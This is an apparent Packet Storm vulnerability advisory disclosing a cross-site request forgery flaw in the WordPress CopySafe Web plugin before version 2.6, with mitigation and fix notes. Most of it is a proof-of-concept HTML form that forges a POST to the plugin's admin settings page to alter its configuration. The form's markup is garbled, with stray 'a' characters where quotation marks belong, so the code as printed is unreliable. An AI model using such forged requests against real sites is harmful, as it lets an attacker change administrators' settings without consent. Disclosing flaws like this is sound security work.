WordPress CopySafe Web Cross Site Request Forgery

2017-04-07T00:00:00
ID PACKETSTORM:142050
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-04-07T00:00:00

Description

                                        
                                            `Details  
=======  
  
  
Software:CopySafe Web  
  
version:<2.6  
  
  
description:Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.  
  
  
========  
Description  
==========  
  
CSRF in wordpress copysafe web allows attacker changes plugin settings  
  
========  
  
  
POC:  
  
=======  
  
  
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">  
  
  
  
<input type="text" name= "admin_only" value="checked">  
  
  
a<input type="text" name="asps" value="">  
a<input type="text" name="upload_path" value="">  
a<input type="text" name="max_size" value="">  
a<input type="text" name="mode" value=acheckeda>  
a<input type=atexta name="submita value="Save Settingsa>  
<input type="submita>  
</form>  
  
=========  
  
  
Mitigations  
  
================  
  
Disable the plugin until a new version is released that fixes this bug.  
  
Fixed  
=========  
  
https://wordpress.org/plugins/wp-copysafe-web/ changelog ->2.6 realease  
  
Best regards,  
Zhiyang Zeng of Tencent security platform department  
  
  
  
`